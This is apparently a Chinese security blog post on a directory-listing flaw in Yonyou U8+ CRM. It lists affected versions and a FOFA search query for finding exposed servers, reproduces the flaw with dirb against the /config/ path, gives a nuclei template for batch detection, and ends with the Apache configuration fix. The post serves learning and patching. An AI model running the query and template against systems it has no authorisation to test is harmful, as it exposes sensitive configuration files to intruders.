用友U8+ CRM目录遍历漏洞
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
一、漏洞名称
用友U8+ CRM目录遍历漏洞
二、漏洞影响
此漏洞影响U8 V16.5, V16.1, V16.0, V15.1, V15.0, V13版本
三、漏洞描述
用友U8+CRM存在目录遍历漏洞,攻击者可利用该漏洞获取敏感信息。
四、资产FOFA搜索语句
body="用友U8CRM"
五、漏洞复现
这个漏洞顾名思义,再结合官方公告中的修复方案描述,猜测可能是config目录,目录遍历类的直接挂上src挖掘工具dirb试一下
dirb http://x.x.x.x:8072/
访问http://x.x.x.x:8072/config/
直接就复现成功了,所以说挖不到0day的时候就拿工具跑一跑,可能就有惊喜。
六、批量漏洞检测poc
id: yonyou-u8-crm-directory-traversal
info:
name: 用友U8+ CRM目录遍历漏洞
author: fgz
severity: high
reference:
- none
metadata:
fofa-query: body="用友U8CRM"
veified: true
tags: yonyou
http:
- method: GET
path:
- "{{BaseURL}}/config/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Index of /config'
condition: and
.\nuclei.exe -t .\HVVault-main\docs\用友\yonyou-u8-crm-directory-traversal.yaml -u http://x.x.x.x:8072
七、漏洞修复
可以修改配置文件,即修改apache配置,将Options Indexes FollowSymLinks修改为Options FollowSymLinks,不在允许列出目录。
或者将补丁压缩包中updateApConf.cmd放到U8SOFT\turbocrm70\apache\conf目录下执行,执行完之后在u8应用管理中重启apache服务。此脚本会自动完成配置。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果